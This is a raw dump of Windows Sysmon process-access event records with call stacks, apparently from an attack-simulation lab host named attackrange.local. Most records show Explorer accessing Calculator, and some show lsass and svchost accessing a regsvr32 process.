22:13:28.429{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361942Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.429{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361941Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.413{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-3708-6013-b803-000000001100}6412C:\Windows\syswow64\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\lsasrv.dll+1792a|C:\Windows\system32\lsasrv.dll+184bf|C:\Windows\system32\lsasrv.dll+17783|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361940Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.413{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-3708-6013-b803-000000001100}6412C:\Windows\syswow64\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\system32\lsasrv.dll+176ae|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361939Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.413{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6c97|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6bab|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f 10341000x8000000000000000361938Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.413{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6b1a|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4 10341000x8000000000000000361937Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.413{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361936Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.413{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361935Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.413{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361934Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.413{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361933Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.413{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361932Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.413{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361931Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.413{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b803-000000001100}6412C:\Windows\syswow64\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+2e3b5|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361930Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.413{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+78223|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361929Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.413{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.pcshell.dll+1aaef|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361928Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.413{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361927Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.413{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361926Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.413{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361925Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.413{8e433fbf-2a44-6013-1100-000000001100}11168568C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b803-000000001100}6412C:\Windows\syswow64\regsvr32.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|c:\windows\system32\rpcss.dll+32369|c:\windows\system32\rpcss.dll+319fb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361924Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.413{8e433fbf-2a44-6013-0e00-000000001100}7124808C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b803-000000001100}6412C:\Windows\syswow64\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rpcss.dll+46b32|c:\windows\system32\rpcss.dll+46af3|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361923Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.397{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361922Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.397{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361921Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.397{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361920Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.397{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361919Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 